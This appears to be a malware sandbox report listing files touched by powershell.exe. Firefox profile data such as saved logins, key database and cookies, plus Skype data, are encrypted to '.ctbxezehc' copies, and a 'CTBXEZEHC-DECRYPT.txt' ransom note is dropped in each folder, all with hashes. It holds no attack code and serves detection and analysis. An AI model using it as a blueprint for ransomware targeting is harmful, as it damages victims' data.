C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.ctbxezehc
binary
MD5: e2d00577dbbbc0da3dd78415ffc17a0c
SHA256: 25d45a564e6ca189f0fae9f2bf46be423e27858718ac63619878d8390a167f3c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.ctbxezehc
binary
MD5: 521e46c4fa1942e25f480db1a5758925
SHA256: cc203387685a56a17b19441ea39160deb8ccbfe193e37dcc6812b346d19bcd38
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.ctbxezehc
binary
MD5: 8af1258799c54a6789571c073a430008
SHA256: 70b759666908cdf3d604c4e45af7ffaa7bcf59e3e1456758373532f928acba5c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.ctbxezehc
binary
MD5: 135dd8a835356f309da2ae7806188f76
SHA256: ab535ba71edbc9e3e8a432aef64dd4d52780d3063e2f8dfbc922c10fd4a8e40c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.ctbxezehc
binary
MD5: a507f773501c8698de1f838b32e4b29c
SHA256: ebdc6e2d8f284087c2811b80e7a5428e8ef57266b28ee694bc435b925dfad22a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.ctbxezehc
binary
MD5: b03539de814af530434c770272fce68f
SHA256: 53a8a11e43d3186c33fc0a78bb010875104d27c859adbbf0df72d2dea448d0f8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.ctbxezehc
binary
MD5: 9d9bf05fbe6c7bd5bb8a6e7617fbf055
SHA256: 6512111f5e8795ad1c3a93fde33c9d7a92e3b02a2860d4d8be8926541f251837
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
dat
MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ctbxezehc
vc
MD5: 2e9a5c00955a889a0412ca765fcd3b73
SHA256: 4d4820f9feacee0f22fc35086d4487f613f9adf2f9935315455f409be4639ec1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.ctbxezehc
binary
MD5: b6a503d858ee6040120c18b5405bf2f8
SHA256: 96880c24b5dc1273d08b69f9c66a432f82e819753741b10de9bc5caf07d14b85
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.ctbxezehc
binary
MD5: dec72a0df9dcd6197c8585320149f639
SHA256: 7a27ec169e35dff282d87fd8097c94a714e7c1c038479cd46955b6fc15e928f9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.ctbxezehc
binary
MD5: a3910e058953cd611dc7be57e57d60fd
SHA256: 7a961af764f9ef3c1eee726be92b6c613b987e34c063472fbc7c28f2aedced4a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.ctbxezehc
binary
MD5: b58856fc74f83b6a4b9ebfa9d75b4236
SHA256: de39fbe68947d3c6821649df94f90bb24641b54b952acaf3ee9a801e06b67d08
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.ctbxezehc
binary
MD5: 16a60ee0b1d1a860d08f1c4726d01270
SHA256: f83a55b13e2ee39d2c8e3fe8fd0180730393a056956897f0a87b819e2fd4c162
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.ctbxezehc
binary
MD5: f1c7bcaab1540b9cd564db5b52c02955
SHA256: 4f23755117c019b3531f8227372b9b72464890c09b6608213da09960343ab447
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.ctbxezehc
binary
MD5: 12f5ca8f8ee86681b752c4574fd91494
SHA256: 815ad0da59b6769246e2707828c69a9d517136a9bef1b4fb70264a25ac0b5a10
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.ctbxezehc
binary
MD5: 3010209b23d77d17a7642488877de90c
SHA256: 5b7e9805c140ffb1a21c21ee6e160cd06cd0f7086ce0f7a7245ffacd6d506273
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\journals\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata.ctbxezehc
binary
MD5: b6ce47e49c0c293fb10de7c283d17ec1
SHA256: 3ccfab9ad955bb89a39f6c17cfe65f18a2e281d27d73762a8c75250bed1f21e5
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite.ctbxezehc
binary
MD5: a29ef8e5563cdaaf8697b51a68922361
SHA256: 43b474b74b5b738a0d6d69cd2a1f348adfff27ef9a1471d6953db399684e59e4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2.ctbxezehc
binary
MD5: 866f96d6271ed855f244d76bacea6044
SHA256: 36fbe880a8e05c73d392bea67f2111c9963ecdfe2c7b5ac4d39474f1cd588a19
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata.ctbxezehc
binary
MD5: 8ba3985a25a87f70ca99d3911a042760
SHA256: e8834078d931f5bcd71195f7df4edd7f819e9df4ed8213f0caa7192cb175d606
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.ctbxezehc
binary
MD5: 4e9f7fa97a0c8b7625fada8402a6e4dd
SHA256: d8122d7ee278c33cc8e0e7fb7c2c19222385a8c7e01fb3b175dc66003bd17582
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.ctbxezehc
binary
MD5: d48f86adedf3d2ae73e554c45e190a1a
SHA256: 1ed167f5e6d9a489bce64694b56ed3787f11e2c56c4957896692ac68c965435e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt.ctbxezehc
binary
MD5: d610f97f55ac9c92624c547d2f7ff076
SHA256: 0730af041230bb734f86a5acaf6188b251c1540d4dd143f79082a58dc2b0b1bc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.ctbxezehc
binary
MD5: cd0e8939713cf0f1a140832730ece25a
SHA256: 2268e5c9923faed7c231f95da5a9824ff3c6288a72cea4df8ee7abee0eba8edb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.ctbxezehc
binary
MD5: bcd46d38c9aadfb74df49151f45884d8
SHA256: 58dbbc3c7b6485e93b4be93547bfc4585df23dc6aed12475a0e204e9bf826623
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.ctbxezehc
binary
MD5: 4fd9bb298f588a8729eb728479e19be4
SHA256: cda4757b26bd2cca99c0797309a0b578f9d4a7e51f3dfaea810adf6007fa0a09
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.ctbxezehc
binary
MD5: 4920826cd114ee2c5e96beee4605bcb6
SHA256: 3177cc312c7b3110b8feeae4130675eb0b3fc54817f71601b50cf0970fe7995c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.ctbxezehc
binary
MD5: cc7494f590e4befbcba95f9de7be783c
SHA256: c73f68abc42f7bdc8668d590524e1ddc436787197e7e434074983ce9d95a22d9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.ctbxezehc
binary
MD5: b8f15f7b48f6d4085a1dc32243c7dc06
SHA256: 753c285476c7ca2b5ec354ba18631b9e58f274ca11f67dce65cbc94ad9009a4d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.ctbxezehc
binary
MD5: 2a5af37111d830be66cc203adb41ab5b
SHA256: 75c35ab9f05a0500f8b59ae2f20ed26b491e7744702f6f4029b5e2a8dc9e57e2
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.ctbxezehc
binary
MD5: 79bf8b7d5a18cc77a5dac161eeb5b598
SHA256: 6cdacecc08bc53fd4bcad9ec4173329cea94d03cdb574ebd82e2b0b86e94da3b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.ctbxezehc
binary
MD5: 640764df03357f7231104ac7556b4237
SHA256: 376febecbfcaf74ca7bb444a4eb23e6ffd35f318389b19c75473d48c7df6d5b0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.ctbxezehc
binary
MD5: c435c89a576415962c2730dc961dc3dc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.ctbxezehc
binary
MD5: ad3576d00534cf5639814f0fb8c11d4d
SHA256: 123244f5cfaea7b43a95e1ac167232cd43d9d220a0c3bdafe649e7fa4ec9861b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.ctbxezehc
binary
MD5: 6bd4993e5539456298cf70b7488a425e
SHA256: ff489e8e599bc8f5d02c18e9f1e0908ee684c1beb6e7bb0256ab085b1aef1c4a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.ctbxezehc
binary
MD5: c22e9f15eab6918fa246d77ec49bcbbc
SHA256: 3648f8f5db0b76ed1295283dbb7bc1a0cef649208c9b265fde50781225e48e4f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.ctbxezehc
binary
MD5: 3f67266e7d9e9004ec875bb028fafc3c
